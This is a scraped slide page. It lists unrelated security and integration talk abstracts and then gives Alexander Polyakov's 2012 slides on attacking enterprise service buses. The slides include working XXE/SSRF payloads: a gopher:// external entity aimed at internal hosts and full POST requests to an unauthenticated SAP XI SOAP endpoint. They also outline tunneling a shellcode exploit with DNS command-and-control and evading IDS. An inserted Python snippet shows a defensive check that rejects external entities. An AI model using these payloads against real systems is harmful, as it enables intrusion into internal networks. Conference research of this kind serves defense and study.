Alfresco DevCon 2019: Encryption at-rest and in-transit
Toni de la Fuente
To guarantee data integrity and confidentiality in Alfresco, we need to implement authentication and encryption at rest and in transit. With the proliferation of microservices, orchestration platforms, complex service topologies and multiple programming languages, there is a demand for new ways to manage service-to-service communication, in some cases without the application needing to be aware of it. In addition, compliance requirements around encryption and authentication come into the picture and require new ways to handle them. This talk will review encryption-at-rest solutions for ADBP and will also discuss solutions for encryption and authentication between services. It will be an introduction to service mesh and TLS/mTLS. We will see a demo of ACS running with Istio over EKS along with tools like WaveScope, Kiali, Jaeger, Grafana, Service Graph and Prometheus.
Slides for a college course at City College San Francisco. Based on "Hands-On Ethical Hacking and Network Defense, Third Edition" by Michael T. Simpson, Kent Backman, and James Corley -- ISBN: 9781285454610.
Instructor: Sam Bowne
Class website: https://samsclass.info/123/123_S17.shtml
Microsoft DirectAccess Remote Access (VPN) with Windows 10 and Server 2012
Kemp
Microsoft DirectAccess is a VPN-like remote access technology that is a core component of the Windows Server 2012 R2 Remote Access role. DirectAccess is a unique solution that is designed to replace traditional VPN access. It provides secure, seamless, transparent and always-on remote access to corporate networks for clients running Windows 7 Enterprise, Windows 7 Ultimate, Windows 8.1 Enterprise, and now, Windows 10.
Windows 10 support is welcome, as over half of the 110 million managed Microsoft clients in enterprise deployments have adopted the latest release, eager as they are to get the new features Windows 10 offers, such as the improved Start menu, the modern Edge web browser, Cortana (the intelligent personal assistant), Windows Hello authentication, and many other improvements.
DirectAccess provides these advantages over most traditional VPN solutions:
- Active Directory Domain joined client computers connect automatically rather than connections being user initiated
- Connections seamlessly work through all firewalls
- Supports selected server access when connected
- Can use IPsec authentication to corporate servers
- Supports end to end encryption of the connection
- Provides transparent failover to another corporate network access point or site if required
- Supports offline domain join for clients that have never been on the corporate network
- Allows central IT staff to manage the remote computers over the DirectAccess connection
The integration with standard corporate Domains and the ability to manage clients remotely is very compelling especially for maintaining a client population that is remote and mobile with users who seldom connect directly to a corporate network.
Windows 10 and DirectAccess work really well in concert to provide a true remote access solution for Windows based clients. One that users will not have to struggle with, and one that IT and security staff can be confident about using.
Hybrid Integration with Dynamics CRM Online, Microsoft Azure Service Bus and ...
Colin Meade
In this presentation we will walk through a real-world hybrid integration solution involving Microsoft Dynamics CRM Online, Microsoft Azure Service Bus, AppFx.ServiceBus and on-premises Line Of Business systems.
We will show how a robust and scalable integration between CRM and on-premises services can be achieved in a relatively short timescale using these technologies.
In their talk "What is an ESB? Concepts in Comparison", Torsten Winterberg (OPITZ CONSULTING) and Bernd Trops (Sopera) explain what an Enterprise Service Bus is and provide background knowledge on the topic.
SoC Keynote: The State of the Art in Integration Technology
Srinath Perera
This talk outlines the state of the art of enterprise software and how we got here, as I see it. The second part describes Ballerina, a new programming language WSO2 has built for enterprise computing.
It is presented as a Keynote at 11th Symposium and Summer School On Service-Oriented Computing.
Security in the cloud Workshop HSTC 2014
Akash Mahajan
A broad overview of what it takes to be secure. This is more of an introduction, where we introduce the basic terms around cloud computing and how to go about securing our information assets (data, applications and infrastructure).
The workshop was fun because all the slides were paired with real world examples of security breaches and attacks.
The traditional datacenter is broken up into a number of silos: network, storage, virtualization, and application. The emerging Software Defined Datacenter movement breaks those silos and creates a playground for innovation, convergence, and new opportunities to reveal the hidden and unknown. During this session I will describe what the Software Defined Data Center hype is all about, how it breaks the traditionally established silos while creating opportunities for data-driven orchestration powered by machine learning principles that will make cloud providers and enterprises FINALLY realize the value of virtualization and ultimately deliver the self-driving data center, where open initiative is front and center.
[Defcon Russia #29] Boris Savkov - Bare-metal programming using the example of Raspber...
DefconRussia
The speaker will show how bare-metal programming can get a Raspberry Pi working with GPIO, memory and Ethernet, and will explain who might need this and why.
[Defcon Russia #29] Alexander Ermolov - Safeguarding rootkits: Intel Boot Gua...
DefconRussia
Intel Boot Guard is a hardware-backed technology for verifying the authenticity of the BIOS, which a computer system vendor can build in at the manufacturing stage. The speaker will present the results of an analysis of the technology and describe its evolution. Attendees will learn how a manufacturing mistake, cloned for years across several vendors, lets a potential attacker use this very technology to plant a hidden rootkit in the system that cannot be removed (even with a programmer!). Github: https://github.com/flothrone/bootguard
[Defcon Russia #29] Alexey Tyurin - Spring autobinding
DefconRussia
Spring MVC has a great feature: autobinding. But if it is used incorrectly, "invisible" vulnerabilities can appear, sometimes with serious impact. We will look at a couple of examples and dig into the subtleties of how autobinding bugs arise. Writeup [ENG]: http://agrrrdog.blogspot.ru/2017/03/autobinding-vulns-and-spring-mvc.html
[Defcon Russia #29] Mikhail Klementyev - Detecting rootkits in GNU/Linux
DefconRussia
Rootkits in the world of Linux-kernel-based operating systems are no longer a rarity. The talk is about how attempts to determine, in today's realities, whether a system is compromised led to an unexpected result.
[DCG 25] Alexander Bolshev - Never Trust Your Inputs or How To Fool an ADC
DefconRussia
We will talk about the general problem of input data validation and the quality of its processing. The interpretation of incoming data has a direct effect on decisions made in physical infrastructure: if some part of the data is handled carelessly, this can affect the efficiency and safety of the process.
In this talk we will discuss attacks on the data processing pipeline and the nature of the "never trust your inputs" concept in the context of cyber-physical systems (in the broad sense, that is, any such systems). To illustrate the problem we use vulnerabilities in analog-to-digital converters (ADCs), which can be made to output a forged digital signal by changing the frequency and phase of the incoming analog signal: a scaling error in such a signal can cause an integer overflow and makes it possible to exploit vulnerabilities in PLC/firmware logic. We will also show real examples of the use of such vulnerabilities and the consequences of these attacks.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not particularly useful for penetration testing.
This talk presents research initiated by our research center to create a shellcode that is as easily portable between different IOS firmwares as possible and that provides many pentesting features, because it can dynamically change the shellcode's target at the post-exploitation stage.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Andrey Belenko, Alexey Troshichev - The internals and security of iClo...
DefconRussia
I will describe where and how iCloud Keychain stores passwords, and what potential risks this carries. Apple claims that the passwords are reliably protected and that even its own employees cannot access them. To confirm or refute this, we need to understand the internals of iCloud Keychain, which is what we will do.
Sergey Belov - Show us the Impact! Proving a threat under difficult conditions
DefconRussia
Bug bounty programs, vulnerability reward programs run by various vendors, are becoming more and more widespread. And sometimes, when hunting for vulnerabilities, you find spots that are clearly insecure (for example, self XSS), but proving a threat from them is hard. Yet the bigger (or rather, the more sensible) the vendor, the more willing they are to discuss it and ask you to demonstrate the threat from the reported vulnerability, and if you succeed, they reward you 8). My talk is a collection of such tricky situations and an account of how the threat can be proven.
Polyakov: How I will break your enterprise. ESB security and more
1. Invest in security
to secure investments
How I will break your enterprise:
ESB Security and more
Alexander Polyakov
CTO at ERPScan (Digital Security)
November 19, 2012
4. Hint
What do we do if we have a secure target website
on a hosting?
5. Answer
• We can do the same for companies
• Just Google for the target company
suppliers and customers
• Pwn one of them
• Find a link to the secured company
6. But how?
• Almost all big companies are connected to each other
• To make their business work
• For example, companies generate automatic Payment Orders
from one business application to another
• They use some kind of middleware to do this
• Sometimes, those systems can be open to the Internet
• Mostly not
• But they must be open for partners
• What kind of systems are u talking about?
10. What do we know about their security?
• Nothing
– Actually, very little info
• They can have vulnerabilities
– A lot of vulnerabilities
• Because they are complex
– Very complex
• And very customized
– Because it’s more of a framework than software
11. Some ESB problems
ESB is all about DATA
• Missing encryption
– Not so easy to configure, so mostly unencrypted
– A lot of swag data transferring
• Support for a lot of interfaces and protocols
– Many points of failure
– Can be used as a proxy to attack other systems
And, of course, all the other software security problems
12. If we attack ESB from a connected company
• We have one bonus
• As we have already pwn’d the connected
company
• We have auth data to connect to ESB
interfaces
• But our goal is to jump through ESB to the
target company
13. IBM WebSphere MQ
• IBM WebSphere MQ
• Middleware application for handling messaging within an enterprise network
• The first ESB that was publicly researched for vulnerabilities (in 2007)
• A great presentation by MWRLab
• Whitepaper with 87 pages of MQ insights!
• http://labs.mwrinfosecurity.com/assets/141/mwri_websphere-mq-security-white-paper-part1_2008-05-06.pdf
14. SAP NetWeaver PI
• SAP NetWeaver PI / XI
• Tool for process integration / system integration
• Has SOAP Adapter
• With default services
• We found one that was accessible without authorizations
• Accepts XML: any XML based attack (Patched by SAP Note 1707494)
• /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG
• More about this later
16. Microsoft BizTalk
• MS BizTalk
• For the same purpose
• ESB toolkit used to be additional software, but in
BizTalk 2013, it is integrated
• 0 results for “BizTalk Security” in search engines
• Doesn’t have default services with auth bypass :(
18. BizTalk map
Diagram: BizTalk sits between the company's internal systems (web portal, HR, data warehouse, logistics, ERP, billing) and external parties (suppliers, customers, banks, insurance, partners, branches).
Picture taken from http://habrahabr.ru/post/94861/
19. Microsoft BizTalk: how it works
• You send data to a virtual “Input port”
• The port can be anything, from a file to an FTP folder or a web
service or something else
• BizTalk takes this data and transforms it (Orchestration)
• There are special tools to perform the transformation
• Then the packet is sent to an “Output port”
So, the simple transformation can have common XML issues
depending on the application
22. BizTalk Transformation example
• The operation is performed by a functoid
• There are a lot of functoids with math and logical stuff
• One of the funniest to attack is Database lookup functoid
• If u find it in some XML, u can connect to external DB’s
• Sometimes with integrated security (trust)
Provider=msdaora;Data Source=thisdb;Persist Security Info=False;Integrated Security=Yes;
• Also supported: Sybase, Oracle, MySQL, Informix, FoxPro,
Firebird, Exchange, Excel, DBase, DB2,Access …
23. BizTalk Binding
Virtual ports must be linked to the real ports they call (binding)
• Static binding. A static port is already configured at the time of
deployment to use a transport so as to deliver messages to a
specific external end point. A transport type selects an adapter and
a URI address.
• Direct binding can also be used to send messages directly into the
message box. External binding configuration cannot be used with
directly bound orchestration ports.
• Dynamic Binding. Transport types and locations dynamically
selected by dynamic ports. The orchestration port is responsible for
having the required properties created within the message context.
27. BizTalk Itinerary: full control over the packet
• Itinerary-based routing simplifies the development of
enterprise-level messaging
• In simple words, an itinerary is a sequence of operations
performed on a message
• An itinerary consists of the list of services to execute (which
can contain routing, transformation, and custom services)
and the configuration information required to resolve the
metadata necessary to execute each of these services
• For example, it may instruct the service to perform UDDI or
Business Rules Engine (BRE) lookup for information about a
specific target end point to which it will route the message
A huge area to have fun
28. Searching for BizTalk applications
• OK, cool, but how can we find all this stuff?
• Except sniffing?
• Answer: UDDI
• Database of all web services installed on BizTalk
• Just look for ports 80 or 8080 for /uddi or /uddipublic
• Add WSDL to URL :)
40. SSRF proxy attack
Diagram: Packet A, carrying Packet B, goes from the attacker to a server in the corporate network; that server then sends Packet B on into the secure network.
41. SSRF
• A possibility to use a vulnerable server as a proxy to attack
other servers located in secure subnetwork
• A way to jump from one subnetwork to another
• A lot of examples of how to run SSRF attack
• We can use any popular business application to run SSRF
• More details about SSRF
– Part 1 http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
– Part 2 http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
42. Exploiting SSRF
For every SSRF attack, there must be at least 2
vulnerabilities to successfully trigger the attack:
• First vulnerability
– Functionality in some service on Server A which allows us to
send remote packets (for other types of SSRF)
• Second vulnerability
– Vuln. in service on server B (for remote SSRF )
– Vuln. in localhost service on server A (for local SSRF)
– Vuln. in client app. on server A (for back-connect SSRF)
43. Multiprotocol calls (in XML)
• A lot of XML stuff in ESB
• XML seems to be the new TCP
• Almost all big projects use XML based data transfer
• There are a lot of XML based protocols with different options to
call external resources and thus conduct SSRF attacks
• There is at least one element type which fits almost all XML
based schemes. The type is: xsd:anyURI
• URIs also encompass URLs of other schemes (e.g., FTP, gopher,
telnet), as well as URNs
• Popular URIs: http:// ftp:// telnet:// …..
44. Multiprotocol calls in XML
• XML
– XML External Entity
– XSD definition
• XML Encryption
• XML Signature
• WS-Policy
• From WS-Security
• WS-Addressing
• XBRL
• ODATA (edmx)
– ODATA External Entity
– Other
• BPEL
• STRATML
• …….
Details: http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
45. Exploiting Gopher (Example)
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
What will happen??
46. XXE Tunneling (Example)
Diagram: the attacker sends Packet A to Server A (Portal or XI, 192.168.0.1); while resolving the external entity, Server A opens a raw connection to Server B (ERP, HR, BW etc., 172.16.0.1) on port 3300 and delivers the AAAAAAAAAAAAA payload, the equivalent of "telnet 172.16.0.1 3300".
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: 192.168.0.1:8000
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>
47. XXE Tunneling (Hint 2)
• Next step is to pack exploit in packet B inside Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports urlencode like HTTP
• It will also help us evade detection by IDS systems
Packet A
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
Content-Length: 7730
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://[Urlencoded Packet B]" >]>
<foo>&date;</foo>
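As an added defensive example (my own code, not from the slides), a Python intake check for an ESB/SOAP input port that parses the XXE payload from slides 45 and 47 with external entity fetching disabled and records every external entity declaration together with its URI scheme, so a gopher:// (or http://, file://) reference is logged and the message rejected instead of the server making the outbound call. The sample messages are constructed and the function names are my own.

```python
"""Defensive intake check for XML arriving at an ESB/SOAP endpoint.

Added example: parse untrusted XML with external entity fetching disabled
and record every external entity declaration with its URI scheme, so
payloads that try to reach gopher://, http:// or file:// targets are
logged and rejected rather than fetched by the server.
"""
import xml.parsers.expat as expat
from urllib.parse import urlsplit

# Constructed sample, modelled on the slides' gopher XXE payload.
SAMPLE_XXE = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >]>
<foo>&date;</foo>"""

# Constructed benign message with no DTD at all.
SAMPLE_CLEAN = b'<?xml version="1.0"?><order><id>42</id></order>'


def inspect_xml(data: bytes):
    """Parse *data* without resolving external entities.

    Returns (external_entities, text): a list of
    (entity_name, system_id, scheme) tuples for every external entity the
    document declared, and the character data the hardened parse produced.
    """
    external = []
    chunks = []
    parser = expat.ParserCreate()

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for SYSTEM/PUBLIC entities; internal ones carry text.
        if value is None:
            scheme = urlsplit(system_id or "").scheme.lower() or "(relative)"
            external.append((name, system_id, scheme))

    def external_ref(context, base, system_id, public_id):
        # Returning 1 without creating a sub-parser tells expat to skip the
        # reference: nothing is fetched, so no outbound gopher/http call.
        return 1

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.CharacterDataHandler = chunks.append
    # Expat only loads an external DTD subset when parameter entity parsing
    # is switched on; it stays off here.
    parser.Parse(data, True)
    return external, "".join(chunks)


def is_suspicious(data: bytes) -> bool:
    """Policy for an ESB input port: any external entity declaration is
    grounds for rejecting the message and logging the attempted target."""
    external, _ = inspect_xml(data)
    return bool(external)


if __name__ == "__main__":
    for label, doc in (("xxe", SAMPLE_XXE), ("clean", SAMPLE_CLEAN)):
        ext, text = inspect_xml(doc)
        print(label, "reject" if ext else "accept", ext, repr(text))
```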
48. XXE Tunneling to Buffer Overflow (Result)
Diagram: Packet A reaches Server A on the Internet (SAP XI); the embedded Packet B reaches Server B in the DMZ (172.16.0.1, behind http://company.com) and delivers the exploit with shellcode; Packet C, the command-and-control response to the attacker, is sent by the shellcode over the DNS protocol with a DNS payload, because DNS is a service that is allowed for outbound connections.
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
Host: sapserver.com:80
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY date SYSTEM "gopher://[packetB]" >]>
<foo>&date;</foo>
49. Great, we can jump from one secured
network to another.
What’s next?
50. We are inside, so what?
• All your systems have password lock policies
• Because we are in a secure company, rrright?
• And secure applications send passwords securely
• While user is authenticating
62. Issue tracking systems
• No, I'm not talking about XSS/SQLI/LFI/OMG/WTF/ETC
• Of course they exist, but
• We are in a “very-very secure” company, which has WAF
• And HTTPS
• Really secure HTTPS (yes Moxie)